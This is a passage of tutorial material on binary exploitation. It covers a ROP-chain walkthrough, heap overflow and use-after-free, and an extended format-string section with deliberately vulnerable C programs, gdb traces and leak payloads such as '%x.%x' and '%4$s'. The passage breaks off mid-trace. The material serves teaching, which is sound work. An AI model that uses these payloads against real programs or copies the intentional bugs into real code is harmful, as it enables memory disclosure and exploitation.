        0xffff0028: 0x400d00            // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled
        0xffff0020: 0x1337beef          // value we want in r15 (probably garbage)
RSP ->  0xffff0018: 0x1337beef          // value we want in rsi

RSI and R15 are popped:

RIP = 0x400c06 (ret)
RDI = 0xdeadbeef
RSI = 0x1337beef

RSP ->  0xffff0028: 0x400d00            // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled

And finally, the RSI gadget rets, jumping to whatever function we want, but now with RDI and RSI set to values we control.
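The walkthrough above can be replayed with a toy emulator that understands only pop and ret. It is a sketch for checking a chain's layout, not a model of a real CPU. The gadget table mirrors the two example gadgets, and run_chain is an illustrative name.

```python
# Fake call stack from the example, lowest address (top of stack) first.
stack = [0x400c01, 0xdeadbeef, 0x400c03, 0x1337beef, 0x1337beef, 0x400d00]

# Registers each gadget pops before its final ret.
gadgets = {0x400c01: ["rdi"], 0x400c03: ["rsi", "r15"]}

def run_chain(stack, gadgets):
    """Emulate pop/ret only; stop at the first address that is not a gadget."""
    regs = {}
    stack = list(stack)
    rip = stack.pop(0)                 # main's ret pops the first address
    while rip in gadgets:
        for reg in gadgets[rip]:
            regs[reg] = stack.pop(0)   # each pop consumes the next stack slot
        rip = stack.pop(0)             # the gadget's ret
    return rip, regs

rip, regs = run_chain(stack, gadgets)
print(hex(rip), {name: hex(value) for name, value in regs.items()})
```

The loop ends with rip at 0x400d00 and both RDI and RSI holding attacker-chosen values, matching the final step of the walkthrough.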

Binary Security

Binary security is the use of tools and methods to protect programs from being manipulated and exploited. These tools are not infallible, but when used together and implemented properly, they can greatly raise the difficulty of exploitation.

Some methods covered include:

The Heap

The heap is a region of memory that a program can use to create objects dynamically. Creating objects on the heap has some advantages compared to using the stack:

Heap allocations can be dynamically sized
Heap allocations "persist" when a function returns

There are also some disadvantages, however:

Heap allocations can be slower
Heap allocations must be manually cleaned up

Using the heap

In C, there are a number of functions used to interact with the heap, but we're going to focus on the two core ones:

malloc: allocate n bytes on the heap
free: free the given allocation

Let's see how these could be used in a program:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main() {
    unsigned alloc_size = 0;
    char *stuff;

    printf("Number of bytes? ");
    scanf("%u", &alloc_size);

    stuff = malloc(alloc_size + 1);
    memset(stuff, 0, alloc_size + 1);  // zero the buffer so the string is NUL-terminated

    read(0, stuff, alloc_size);

    printf("You wrote: %s", stuff);

    free(stuff);

    return 0;
}

This program reads in a size from the user, creates an allocation of that size on the heap, reads in that many bytes, then prints it back out to the user.

Heap Exploits

Overflow

Much like a stack buffer overflow, a heap overflow is a vulnerability where more data than can fit in the allocated buffer is read in. This could lead to heap metadata corruption, or corruption of other heap objects, which could in turn provide a new attack surface.

Use After Free (UAF)

Once free is called on an allocation, the allocator is free to reallocate that chunk of memory in future calls to malloc if it so chooses. However, if the program author isn't careful and uses the freed object later on, the contents may be corrupt (or even attacker controlled). This is called use after free or UAF.

Example

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

typedef struct string {
    unsigned length;
    char *data;
} string;

int main() {
    struct string* s = malloc(sizeof(string));
    puts("Length:");
    scanf("%u", &s->length);
    s->data = malloc(s->length + 1);
    memset(s->data, 0, s->length + 1);
    puts("Data:");
    read(0, s->data, s->length);

    free(s->data);
    free(s);

    char *s2 = malloc(16);
    memset(s2, 0, 16);
    puts("More data:");
    read(0, s2, 15);

    // Now using s again, a UAF

    puts(s->data);

    return 0;
}

In this example, we have a string structure with a length and a pointer to the actual string data. We properly allocate, fill, and then free an instance of this structure. Then we make another allocation, fill it, and then improperly reference the freed string. Due to how glibc's allocator works, s2 will actually get the same memory as the original s allocation, which in turn gives us the ability to control the s->data pointer. This could be used to leak program data.
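The reuse behavior can be illustrated with a toy allocator. This is a deliberately simplified model, not glibc's implementation: it only assumes that freed chunks of the same size are handed back most-recently-freed first, and the class and sizes are illustrative (16 bytes for the struct is an assumption about a typical 64-bit build).

```python
class ToyAllocator:
    """Toy model: freed chunks of a given size are reused last-in, first-out."""

    def __init__(self):
        self.free_lists = {}      # size -> list of freed chunk ids
        self.next_id = 0

    def malloc(self, size):
        bucket = self.free_lists.get(size)
        if bucket:
            return bucket.pop()   # reuse the most recently freed chunk
        self.next_id += 1         # otherwise hand out a brand-new chunk
        return self.next_id

    def free(self, size, chunk):
        self.free_lists.setdefault(size, []).append(chunk)

heap = ToyAllocator()
s = heap.malloc(16)       # the struct string allocation
data = heap.malloc(33)    # s->data for a length of 32
heap.free(33, data)
heap.free(16, s)
s2 = heap.malloc(16)      # same size as s, so the freed chunk is reused
print(s2 == s)
```

In this model s2 aliases the chunk that s still points to, so writing through s2 changes what a later read of s->data sees.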

Advanced Heap Exploitation

Not only can the heap be exploited by the data in allocations, but exploits can also use the underlying mechanisms in malloc, free, etc. to exploit a program. This is beyond the scope of CTF 101, but here are a few recommended resources:

Format String Vulnerability

A format string vulnerability is a bug where user input is passed as the format argument to printf, scanf, or another function in that family.

The format argument supports many different specifiers, which could allow an attacker to leak data if they control the format argument to printf. Since printf and similar functions are variadic, they will continue popping data off of the stack according to the format.

For example, if we can make the format argument "%x.%x.%x.%x", printf will pop off four stack values and print them in hexadecimal, potentially leaking sensitive information.

printf can also index to an arbitrary "argument" with the following syntax: "%n$x" (where n is the decimal index of the argument you want).

While these bugs are powerful, they are much rarer nowadays, because modern compilers such as GCC and Clang can warn when printf is called with a non-constant format string (for example, via -Wformat-security).

Example

#include <stdio.h>
#include <unistd.h>

int main() {
    int secret_num = 0x8badf00d;

    char name[64] = {0};
    read(0, name, 64);
    printf("Hello ");
    printf(name);
    printf("! You'll never get my secret!\n");
    return 0;
}

Due to how GCC decided to lay out the stack, secret_num is actually at a lower address on the stack than name, so we only have to go to the 7th "argument" in printf to leak the secret:

$ ./fmt_string
%7$llx
Hello 8badf00d3ea43eef
! You'll never get my secret!
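The %llx conversion prints eight bytes at once, so the leaked value contains the secret together with four neighboring bytes. A short sketch of splitting it, using the value from the sample run above:

```python
leaked = 0x8badf00d3ea43eef          # value printed by %7$llx in the run above

low_word = leaked & 0xffffffff       # the four bytes at the lower address (little-endian)
high_word = leaked >> 32             # the four bytes at the higher address

print(hex(low_word), hex(high_word))
```

The upper half equals the 0x8badf00d assigned to secret_num in the source. The lower half is whatever happened to sit next to it on the stack in that run.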

Binary Exploitation

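3.1.1 Format String Vulnerabilities

Formatted output functions and format strings

The chapter on C language basics covers formatted output functions and format strings in detail, and it is strongly recommended to review that chapter before exploring format string vulnerabilities. Here we briefly recap the most commonly used ones.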

Functions

#include <stdio.h>

int printf(const char *format, ...);
int fprintf(FILE *stream, const char *format, ...);
int dprintf(int fd, const char *format, ...);
int sprintf(char *str, const char *format, ...);
int snprintf(char *str, size_t size, const char *format, ...);

Conversion specifiers

Character	Type	Usage
d	4-byte	Integer
u	4-byte	Unsigned Integer
x	4-byte	Hex
s	4-byte ptr	String
c	1-byte	Character

Length modifiers

Character	Type	Usage
hh	1-byte	char
h	2-byte	short int
l	4-byte	long int
ll	8-byte	long long int

Examples

#include<stdio.h>
#include<stdlib.h>
void main() {
    char *format = "%s";
    char *arg1 = "Hello World!\n";
    printf(format, arg1);
}

printf("%03d.%03d.%03d.%03d", 127, 0, 0, 1);    // "127.000.000.001"
printf("%.2f", 1.2345);   // 1.23
printf("%#010x", 3735928559);   // 0xdeadbeef

printf("%s%n", "01234", &n);  // n = 5

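Basic principles of format string vulnerabilities

On x86, the arguments of a formatted output function are passed on the stack. Consider an example: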

#include<stdio.h>
void main() {
    printf("%s %d %s", "Hello World!", 233, "\n");
}

gdb-peda$ disassemble main
Dump of assembler code for function main:
   0x0000053d <+0>:     lea    ecx,[esp+0x4]
   0x00000541 <+4>:     and    esp,0xfffffff0
   0x00000544 <+7>:     push   DWORD PTR [ecx-0x4]
   0x00000547 <+10>:    push   ebp
   0x00000548 <+11>:    mov    ebp,esp
   0x0000054a <+13>:    push   ebx
   0x0000054b <+14>:    push   ecx
   0x0000054c <+15>:    call   0x585 <__x86.get_pc_thunk.ax>
   0x00000551 <+20>:    add    eax,0x1aaf
   0x00000556 <+25>:    lea    edx,[eax-0x19f0]
   0x0000055c <+31>:    push   edx
   0x0000055d <+32>:    push   0xe9
   0x00000562 <+37>:    lea    edx,[eax-0x19ee]
   0x00000568 <+43>:    push   edx
   0x00000569 <+44>:    lea    edx,[eax-0x19e1]
   0x0000056f <+50>:    push   edx
   0x00000570 <+51>:    mov    ebx,eax
   0x00000572 <+53>:    call   0x3d0 <printf@plt>
   0x00000577 <+58>:    add    esp,0x10
   0x0000057a <+61>:    nop
   0x0000057b <+62>:    lea    esp,[ebp-0x8]
   0x0000057e <+65>:    pop    ecx
   0x0000057f <+66>:    pop    ebx
   0x00000580 <+67>:    pop    ebp
   0x00000581 <+68>:    lea    esp,[ecx-0x4]
   0x00000584 <+71>:    ret
End of assembler dump.
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0x56557000 --> 0x1efc
EBX: 0x56557000 --> 0x1efc
ECX: 0xffffd250 --> 0x1
EDX: 0x5655561f ("%s %d %s")
ESI: 0xf7f95000 --> 0x1bbd90
EDI: 0x0
EBP: 0xffffd238 --> 0x0
ESP: 0xffffd220 --> 0x5655561f ("%s %d %s")
EIP: 0x56555572 (<main+53>: call   0x565553d0 <printf@plt>)
EFLAGS: 0x216 (carry PARITY ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x56555569 <main+44>:    lea    edx,[eax-0x19e1]
   0x5655556f <main+50>:    push   edx
   0x56555570 <main+51>:    mov    ebx,eax
=> 0x56555572 <main+53>:    call   0x565553d0 <printf@plt>
   0x56555577 <main+58>:    add    esp,0x10
   0x5655557a <main+61>:    nop
   0x5655557b <main+62>:    lea    esp,[ebp-0x8]
   0x5655557e <main+65>:    pop    ecx
Guessed arguments:
arg[0]: 0x5655561f ("%s %d %s")
arg[1]: 0x56555612 ("Hello World!")
arg[2]: 0xe9
arg[3]: 0x56555610 --> 0x6548000a ('\n')
[------------------------------------stack-------------------------------------]
0000| 0xffffd220 --> 0x5655561f ("%s %d %s")
0004| 0xffffd224 --> 0x56555612 ("Hello World!")
0008| 0xffffd228 --> 0xe9
0012| 0xffffd22c --> 0x56555610 --> 0x6548000a ('\n')
0016| 0xffffd230 --> 0xffffd250 --> 0x1
0020| 0xffffd234 --> 0x0
0024| 0xffffd238 --> 0x0
0028| 0xffffd23c --> 0xf7df1253 (<__libc_start_main+243>:   add    esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x56555572 in main ()
gdb-peda$ c
Continuing.
Hello World! 233
[Inferior 1 (process 27416) exited with code 022]

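Under the cdecl calling convention, the arguments are pushed onto the stack from right to left before printf() is entered. Once inside, printf() fetches its first argument, the format string, and reads it one character at a time. A character other than % is copied straight to the output. Otherwise, printf() reads the characters that follow the %, fetches the corresponding argument, and formats and prints it. (Note: in % d the space is a flag character; the directive still consumes one int argument, just as %d does.)

Next, we modify the program above by appending %x %x %x %3$s to the format string, which introduces a format string vulnerability: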

#include<stdio.h>
void main() {
    printf("%s %d %s %x %x %x %3$s", "Hello World!", 233, "\n");
}

The disassembly is the same as before, so we focus on how the arguments are passed:

gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0x56557000 --> 0x1efc
EBX: 0x56557000 --> 0x1efc
ECX: 0xffffd250 --> 0x1
EDX: 0x5655561f ("%s %d %s %x %x %x %3$s")
ESI: 0xf7f95000 --> 0x1bbd90
EDI: 0x0
EBP: 0xffffd238 --> 0x0
ESP: 0xffffd220 --> 0x5655561f ("%s %d %s %x %x %x %3$s")
EIP: 0x56555572 (<main+53>: call   0x565553d0 <printf@plt>)
EFLAGS: 0x216 (carry PARITY ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x56555569 <main+44>:    lea    edx,[eax-0x19e1]
   0x5655556f <main+50>:    push   edx
   0x56555570 <main+51>:    mov    ebx,eax
=> 0x56555572 <main+53>:    call   0x565553d0 <printf@plt>
   0x56555577 <main+58>:    add    esp,0x10
   0x5655557a <main+61>:    nop
   0x5655557b <main+62>:    lea    esp,[ebp-0x8]
   0x5655557e <main+65>:    pop    ecx
Guessed arguments:
arg[0]: 0x5655561f ("%s %d %s %x %x %x %3$s")
arg[1]: 0x56555612 ("Hello World!")
arg[2]: 0xe9
arg[3]: 0x56555610 --> 0x6548000a ('\n')
[------------------------------------stack-------------------------------------]
0000| 0xffffd220 --> 0x5655561f ("%s %d %s %x %x %x %3$s")
0004| 0xffffd224 --> 0x56555612 ("Hello World!")
0008| 0xffffd228 --> 0xe9
0012| 0xffffd22c --> 0x56555610 --> 0x6548000a ('\n')
0016| 0xffffd230 --> 0xffffd250 --> 0x1
0020| 0xffffd234 --> 0x0
0024| 0xffffd238 --> 0x0
0028| 0xffffd23c --> 0xf7df1253 (<__libc_start_main+243>:   add    esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x56555572 in main ()
gdb-peda$ c
Continuing.
Hello World! 233
 ffffd250 0 0
[Inferior 1 (process 27480) exited with code 041]

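The stack layout is the same as last time; only the format string has changed. The program printed seven values (including the newline), but we only supplied the first three. The three %x directives printed the stack contents at 0xffffd230 through 0xffffd238, none of which we provided. The final directive, %3$s, reuses the \n at 0xffffd22c.

In the previous example, the format string asked for more arguments than we supplied. In the next example we leave out the format string altogether, which is also a vulnerability: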

#include<stdio.h>
void main() {
    char buf[50];
    if (fgets(buf, sizeof buf, stdin) == NULL)
        return;
    printf(buf);
}

gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffffd1fa ("Hello %x %x %x !\n")
EBX: 0x56557000 --> 0x1ef8
ECX: 0xffffd1fa ("Hello %x %x %x !\n")
EDX: 0xf7f9685c --> 0x0
ESI: 0xf7f95000 --> 0x1bbd90
EDI: 0x0
EBP: 0xffffd238 --> 0x0
ESP: 0xffffd1e0 --> 0xffffd1fa ("Hello %x %x %x !\n")
EIP: 0x5655562a (<main+77>: call   0x56555450 <printf@plt>)
EFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x56555623 <main+70>:    sub    esp,0xc
   0x56555626 <main+73>:    lea    eax,[ebp-0x3e]
   0x56555629 <main+76>:    push   eax
=> 0x5655562a <main+77>:    call   0x56555450 <printf@plt>
   0x5655562f <main+82>:    add    esp,0x10
   0x56555632 <main+85>:    jmp    0x56555635 <main+88>
   0x56555634 <main+87>:    nop
   0x56555635 <main+88>:    mov    eax,DWORD PTR [ebp-0xc]
Guessed arguments:
arg[0]: 0xffffd1fa ("Hello %x %x %x !\n")
[------------------------------------stack-------------------------------------]
0000| 0xffffd1e0 --> 0xffffd1fa ("Hello %x %x %x !\n")
0004| 0xffffd1e4 --> 0x32 ('2')
0008| 0xffffd1e8 --> 0xf7f95580 --> 0xfbad2288
0012| 0xffffd1ec --> 0x565555f4 (<main+23>: add    ebx,0x1a0c)
0016| 0xffffd1f0 --> 0xffffffff
0020| 0xffffd1f4 --> 0xffffd47a ("/home/firmy/Desktop/RE4B/c.out")
0024| 0xffffd1f8 --> 0x65485ea0
0028| 0xffffd1fc ("llo %x %x %x !\n")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x5655562a in main ()
gdb-peda$ c
Continuing.
Hello 32 f7f95580 565555f4 !
[Inferior 1 (process 28253) exited normally]

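If everyone behaves and enters ordinary text, the program works fine. But because no format string is given, any conversion specifiers we put into buf are parsed by printf() as a format string, and the vulnerability is triggered. In the demonstration above we entered Hello %x %x %x ! (the trailing \n is the newline we typed, which fgets() stores in the buffer), and the program printed data from the stack.

To summarize, a format string vulnerability arises whenever the arguments a format string asks for do not match the arguments actually supplied. Two questions follow:

Why does this compile?
- Because printf() is declared as taking a variable number of arguments.
- To detect a mismatch, the compiler would need to understand how printf() works and what a format string is. The C language itself does not require the compiler to know this.
- Sometimes the format string is not fixed; it may be generated dynamically while the program runs.

Can printf() detect the mismatch itself?
- printf() fetches its arguments from the stack; if it needs three, it takes three. Unless the boundary of the arguments were marked on the stack, printf() cannot know that it has fetched more arguments than it was given, and no such marker exists.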

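Exploiting format string vulnerabilities

By supplying the format string, we control the behavior of the formatting function. The main ways to exploit the vulnerability are as follows.

Crashing the program

Format string vulnerabilities are often only discovered when a program crashes, so the simplest way to exploit one is to crash the process. On Linux, accessing an invalid pointer causes the process to receive SIGSEGV, which terminates it abnormally and produces a core dump (core dumps are covered in detail in the Linux basics chapter). A core dump stores a great deal of important information about the program at the moment of the crash, which is exactly what an attacker needs.

A format string like the following triggers the vulnerability: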

printf("%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s")

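For each %s, printf() fetches a number from the stack, treats it as an address, and prints the memory at that address until it reaches a null character.
Not every number fetched is a valid address, so the memory it refers to may not exist.
The number may also be a real address that is protected.

Viewing stack contents

Crashing the program is only the first step in confirming the vulnerability. An attacker can also use formatted output functions to read memory in preparation for further exploitation. As we have seen, a formatting function fetches values from the stack according to the format string. On x86 the stack grows from high addresses toward low addresses, and the arguments to printf() are pushed in reverse order, so the arguments appear in memory in the same order as they appear in the printf() call.

The demonstrations below all use the following source code: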
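The ordering claim can be checked with a small model of cdecl argument pushing. This is a sketch: the argument values are those of the printf() call in the example program that follows, the starting ESP is chosen so that the result lines up with that trace, and push_args_cdecl is an illustrative name.

```python
def push_args_cdecl(args, esp=0xffffd564, word=4):
    """Push args right to left onto a downward-growing stack; return memory and ESP."""
    memory = {}
    for value in reversed(args):      # the last argument is pushed first
        esp -= word                   # the stack grows toward lower addresses
        memory[esp] = value
    return memory, esp

# format pointer, arg1, arg2, arg3, pointer to arg4
call_args = [0xffffd584, 0x1, 0x88888888, 0xffffffff, 0xffffd57a]
memory, esp = push_args_cdecl(call_args)

for addr in sorted(memory):           # walk upward from ESP, as printf() does
    print(hex(addr), hex(memory[addr]))
```

Reading upward from ESP yields the arguments in call order, which is why a format string that asks for extra values simply keeps walking into higher stack addresses.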

#include<stdio.h>
void main() {
    char format[128];
    int arg1 = 1, arg2 = 0x88888888, arg3 = -1;
    char arg4[10] = "ABCD";
    scanf("%s", format);
    printf(format, arg1, arg2, arg3, arg4);
    printf("\n");
}

# echo 0 > /proc/sys/kernel/randomize_va_space
$ gcc -m32 -fno-stack-protector -no-pie fmt.c

We first set a breakpoint with b main and step with n. At call 0x56555460 <__isoc99_scanf@plt> we enter %08x.%08x.%08x.%08x.%08x, then continue with c to see the output.

gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffffd584 ("%08x.%08x.%08x.%08x.%08x")
EBX: 0x56557000 --> 0x1efc
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd618 --> 0x0
ESP: 0xffffd550 --> 0xffffd584 ("%08x.%08x.%08x.%08x.%08x")
EIP: 0x56555642 (<main+133>:    call   0x56555430 <printf@plt>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x56555638 <main+123>:       push   DWORD PTR [ebp-0xc]
   0x5655563b <main+126>:       lea    eax,[ebp-0x94]
   0x56555641 <main+132>:       push   eax
=> 0x56555642 <main+133>:       call   0x56555430 <printf@plt>
   0x56555647 <main+138>:       add    esp,0x20
   0x5655564a <main+141>:       sub    esp,0xc
   0x5655564d <main+144>:       push   0xa
   0x5655564f <main+146>:       call   0x56555450 <putchar@plt>
Guessed arguments:
arg[0]: 0xffffd584 ("%08x.%08x.%08x.%08x.%08x")
arg[1]: 0x1
arg[2]: 0x88888888
arg[3]: 0xffffffff
arg[4]: 0xffffd57a ("ABCD")
[------------------------------------stack-------------------------------------]
0000| 0xffffd550 --> 0xffffd584 ("%08x.%08x.%08x.%08x.%08x")
0004| 0xffffd554 --> 0x1
0008| 0xffffd558 --> 0x88888888
0012| 0xffffd55c --> 0xffffffff
0016| 0xffffd560 --> 0xffffd57a ("ABCD")
0020| 0xffffd564 --> 0xffffd584 ("%08x.%08x.%08x.%08x.%08x")
0024| 0xffffd568 (" RUV\327UUVT\332\377\367\001")
0028| 0xffffd56c --> 0x565555d7 (<main+26>:     add    ebx,0x1a29)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x56555642 in main ()
gdb-peda$ x/10x $esp
0xffffd550:     0xffffd584      0x00000001      0x88888888      0xffffffff
0xffffd560:     0xffffd57a      0xffffd584      0x56555220      0x565555d7
0xffffd570:     0xf7ffda54      0x00000001
gdb-peda$ c
Continuing.
00000001.88888888.ffffffff.ffffd57a.ffffd584

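The address of the format string, 0xffffd584, sits in memory immediately before the arguments arg1, arg2, arg3, and arg4. The format string %08x.%08x.%08x.%08x.%08x tells printf() to take five arguments from the stack and display each as an 8-digit hexadecimal number. A formatted output function uses an internal variable to track the position of the next argument. Initially this argument pointer points at the first argument (arg1). As each argument is consumed by its conversion specification, the pointer advances by the size of that argument. After displaying the remaining automatic variables of the currently executing function, printf() goes on to display that function's stack frame (including the return address and its arguments).

Of course, %p.%p.%p.%p.%p gives a similar result.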

gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffffd584 ("%p.%p.%p.%p.%p")
EBX: 0x56557000 --> 0x1efc
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd618 --> 0x0
ESP: 0xffffd550 --> 0xffffd584 ("%p.%p.%p.%p.%p")
EIP: 0x56555642 (<main+133>:    call   0x56555430 <printf@plt>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x56555638 <main+123>:       push   DWORD PTR [ebp-0xc]
   0x5655563b <main+126>:       lea    eax,[ebp-0x94]
   0x56555641 <main+132>:       push   eax
=> 0x56555642 <main+133>:       call   0x56555430 <printf@plt>
   0x56555647 <main+138>:       add    esp,0x20
   0x5655564a <main+141>:       sub    esp,0xc
   0x5655564d <main+144>:       push   0xa
   0x5655564f <main+146>:       call   0x56555450 <putchar@plt>
Guessed arguments:
arg[0]: 0xffffd584 ("%p.%p.%p.%p.%p")
arg[1]: 0x1
arg[2]: 0x88888888
arg[3]: 0xffffffff
arg[4]: 0xffffd57a ("ABCD")
[------------------------------------stack-------------------------------------]
0000| 0xffffd550 --> 0xffffd584 ("%p.%p.%p.%p.%p")
0004| 0xffffd554 --> 0x1
0008| 0xffffd558 --> 0x88888888
0012| 0xffffd55c --> 0xffffffff
0016| 0xffffd560 --> 0xffffd57a ("ABCD")
0020| 0xffffd564 --> 0xffffd584 ("%p.%p.%p.%p.%p")
0024| 0xffffd568 (" RUV\327UUVT\332\377\367\001")
0028| 0xffffd56c --> 0x565555d7 (<main+26>:     add    ebx,0x1a29)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x56555642 in main ()
gdb-peda$ c
Continuing.
0x1.0x88888888.0xffffffff.0xffffd57a.0xffffd584

The methods above fetch stack values in sequence. To fetch one specific argument directly, we can use a format string like this:

%<arg#>$<format>

%n$x

Here n refers to the n-th value on the stack after the format string argument.

gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffffd584 ("%3$x.%1$08x.%2$p.%2$p.%4$p.%5$p.%6$p")
EBX: 0x56557000 --> 0x1efc
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd618 --> 0x0
ESP: 0xffffd550 --> 0xffffd584 ("%3$x.%1$08x.%2$p.%2$p.%4$p.%5$p.%6$p")
EIP: 0x56555642 (<main+133>:    call   0x56555430 <printf@plt>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x56555638 <main+123>:       push   DWORD PTR [ebp-0xc]
   0x5655563b <main+126>:       lea    eax,[ebp-0x94]
   0x56555641 <main+132>:       push   eax
=> 0x56555642 <main+133>:       call   0x56555430 <printf@plt>
   0x56555647 <main+138>:       add    esp,0x20
   0x5655564a <main+141>:       sub    esp,0xc
   0x5655564d <main+144>:       push   0xa
   0x5655564f <main+146>:       call   0x56555450 <putchar@plt>
Guessed arguments:
arg[0]: 0xffffd584 ("%3$x.%1$08x.%2$p.%2$p.%4$p.%5$p.%6$p")
arg[1]: 0x1
arg[2]: 0x88888888
arg[3]: 0xffffffff
arg[4]: 0xffffd57a ("ABCD")
[------------------------------------stack-------------------------------------]
0000| 0xffffd550 --> 0xffffd584 ("%3$x.%1$08x.%2$p.%2$p.%4$p.%5$p.%6$p")
0004| 0xffffd554 --> 0x1
0008| 0xffffd558 --> 0x88888888
0012| 0xffffd55c --> 0xffffffff
0016| 0xffffd560 --> 0xffffd57a ("ABCD")
0020| 0xffffd564 --> 0xffffd584 ("%3$x.%1$08x.%2$p.%2$p.%4$p.%5$p.%6$p")
0024| 0xffffd568 (" RUV\327UUVT\332\377\367\001")
0028| 0xffffd56c --> 0x565555d7 (<main+26>:     add    ebx,0x1a29)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x56555642 in main ()
gdb-peda$ x/10w $esp
0xffffd550:     0xffffd584      0x00000001      0x88888888      0xffffffff
0xffffd560:     0xffffd57a      0xffffd584      0x56555220      0x565555d7
0xffffd570:     0xf7ffda54      0x00000001
gdb-peda$ c
Continuing.
ffffffff.00000001.0x88888888.0x88888888.0xffffd57a.0xffffd584.0x56555220

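Here the format string is at address 0xffffd584. With the format string %3$x.%1$08x.%2$p.%2$p.%4$p.%5$p.%6$p we fetched arg3, arg1, arg2 twice, arg4, and the two stack values that follow the arguments. This method is very powerful: it can fetch any value on the stack.

Viewing memory at an arbitrary address

An attacker can use a conversion specification that displays the memory at a given address to view memory anywhere. For example, %s displays the memory at the address held in the argument that the argument pointer refers to, treating it as an ASCII string until a null character is reached. If the attacker can make the argument pointer refer to a chosen address, %s prints the memory at that location.

Using the same program, we enter %4$s, and the output for arg4 becomes ABCD rather than the address 0xffffd57a: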
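The positional lookups can be replayed offline against the words from the x/10w $esp dump. The sketch below is a toy expander that understands only %N$x and %N$p with an optional zero-padded width. It is not a reimplementation of printf(), and render and stack_words are illustrative names.

```python
import re

# Words that follow the format-string pointer when printf() is called,
# copied from the x/10w $esp dump (positional index 1 is the first one).
stack_words = [0x1, 0x88888888, 0xffffffff, 0xffffd57a, 0xffffd584, 0x56555220]

DIRECTIVE = re.compile(r"%(\d+)\$(0?\d*)([xp])")

def render(fmt, words):
    """Expand %N$x and %N$p directives against a list of 32-bit stack words."""
    def expand(match):
        index, width, conv = match.groups()
        value = words[int(index) - 1]          # positional indexes start at 1
        if conv == "p":
            return hex(value) if value else "(nil)"
        pad = "0" if width.startswith("0") else " "
        return format(value, "x").rjust(int(width or 0), pad)
    return DIRECTIVE.sub(expand, fmt)

print(render("%3$x.%1$08x.%2$p.%2$p.%4$p.%5$p.%6$p", stack_words))
```

The printed line matches the program output in the trace, which confirms that index n simply selects the n-th 4-byte word above the format-string pointer.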

gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffffd584 ("%4$s")
EBX: 0x56557000 --> 0x1efc
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd618 --> 0x0
ESP: 0xffffd550 --> 0xffffd584 ("%4$s")
EIP: 0x56555642 (<main+133>:    call   0x56555430 <printf@plt>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x56555638 <main+123>:       push   DWORD PTR [ebp-0xc]
   0x5655563b <main+126>:       lea    eax,[ebp-0x94]
   0x56555641 <main+132>:       push   eax
=> 0x56555642 <main+133>:       call   0x56555430 <printf@plt>
   0x56555647 <main+138>:       add    esp,0x20
   0x5655564a <main+141>:       sub    esp,0xc
   0x5655564d <main+144>:       push   0xa
   0x5655564f <main+146>:       call   0x56555450 <putchar@plt>
Guessed arguments:
arg[0]: 0xffffd584 ("%4$s")
arg[1]: 0x1
arg[2]: 0x88888888
arg[3]: 0xffffffff
arg[4]: 0xffffd57a ("ABCD")
[------------------------------------stack-------------------------------------]
0000| 0xffffd550 --> 0xffffd584 ("%4$s")
0004| 0xffffd554 --> 0x1
0008| 0xffffd558 --> 0x88888888
0012| 0xffffd55c --> 0xffffffff
0016| 0xffffd560 --> 0xffffd57a ("ABCD")
0020| 0xffffd564 --> 0xffffd584 ("%4$s")
0024| 0xffffd568 (" RUV\327UUVT\332\377\367\001")
0028| 0xffffd56c --> 0x565555d7 (<main+26>:     add    ebx,0x1a29)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x56555642 in main ()
gdb-peda$ c
Continuing.
ABCD

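The example above can only read through pointers that are already on the stack. To read an arbitrary address, we have to place the address on the stack ourselves. We enter a format string of the form AAAA.%p and observe how the stack changes.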

gdb-peda$ python print("AAAA"+".%p"*20)
AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
...
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffffd584 ("AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p")
EBX: 0x56557000 --> 0x1efc
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd618 --> 0x0
